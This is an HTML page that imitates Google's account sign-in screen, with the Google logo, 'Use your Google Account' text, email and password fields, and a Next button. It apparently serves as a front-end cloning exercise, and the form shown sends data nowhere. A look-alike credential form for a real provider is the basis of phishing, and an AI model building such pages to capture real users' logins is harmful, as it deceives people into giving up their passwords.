<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
    <link
      href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
      rel="stylesheet"
    />
    <!-- CSS link -->
    <link rel="stylesheet" href="style.css" />
    <!-- JQuery link -->
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
  </head>
  <body>
    <div class="container">
      <div class="logo">
        <img src="googleLogo.png" alt="logo.png" />
      </div>
      <div class="form-box">
        <h1>Sign in</h1>
        <span> Use your Google Account </span>
        <form>
          <div class="input-box">
            <input
              type="email"
              name="email"
              id="email-field"
              class="input-field"
              required
              autofocus
              autocomplete="off"
            />
            <label for="email-field" class="placeholder">Email or Phone</label>
</div>
<div class="input-box">
            <input
              type="password"
              name="password"
              id="password-field"
              class="input-field"
              required
            />
            <label for="password-field" class="placeholder"
              >Enter Your Password</label
            >
          </div>
          <a href="#" class="forgot">Forgot email?</a>
          <div class="buttons">
            <a href="#" class="create-account">Create account</a>
            <button class="sign-in">Next</button>
          </div>
        </form>
      </div>
    </div>

    
  </body>
  <script src="script.js"></script>
</html>
